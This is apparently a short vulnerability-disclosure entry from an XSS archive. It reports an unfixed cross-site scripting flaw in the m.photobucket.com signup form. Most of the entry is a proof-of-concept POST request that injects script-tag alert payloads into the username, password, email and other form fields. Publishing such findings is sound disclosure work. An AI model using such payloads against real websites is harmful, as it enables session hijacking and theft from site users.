Security researcher Azat Harutyunyan, has submitted on 06/06/2009 a cross-site-scripting (XSS) vulnerability affecting m.photobucket.com, which at the time of submission ranked 56 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 06/06/2009 |
Date published: 21/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
URL: http://m.photobucket.com/join |
POST: ?newuserid=&username=><script>alert("Xssed")<%2Fscript>><script>alert("Xssed")<%2Fscript>><script>al ert("Xssed")<%2Fscript>><script>alert("Xssed")<%2Fscript>&password=><script>alert("Xssed")<%2Fscript >><script>alert("Xssed")<%2Fscript>><script>alert("Xssed")<%2Fscript>&email=><script>alert("Xssed")< %2Fscript>><script>alert("Xssed")<%2Fscript>><script>alert("Xssed")<%2Fscript>&birthmonth=&birthday= ><script>alert("Xssed")</script>&birthyear=&gender=><script>alert("Xssed")</script>M&secret=&captcha Key=2601244251716951 |
Click here to view the mirror
|
|
|